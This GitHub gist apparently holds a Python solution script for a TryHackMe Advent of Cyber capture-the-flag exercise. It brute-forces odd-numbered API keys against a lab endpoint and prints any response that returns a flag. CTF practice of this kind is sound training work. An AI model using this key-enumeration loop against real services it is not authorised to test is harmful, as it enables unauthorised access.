Last active
December 25, 2020 03:10
-
-
Save drsh0/6773bb21961b9290ea6088d051310ec7 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python3 | |
## TryHackMe Advent Calendar 2020 Day 16 | |
## https://tryhackme.com/room/adventofcyber2 | |
import requests | |
# The code below assumes an api endpoint with a odd-numbered key that we don't know the value of. The correct value will produce a flag. | |
# for loop to go over 1-100 key values, step by 2 to have odd numbers only | |
for api_key in range(1,100,2): | |
# print what api key value we are iterating | |
print(f"api_key {api_key}") | |
# this is the api endoing we are sending requests to | |
r = requests.get(f'http://10.10.203.163:8000/api/{api_key}') | |
# only print text out if there are no failures or protections in place | |
if "Error" not in str(r.text) and "PROTECTION" not in str(r.text): | |
print(r.text) | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment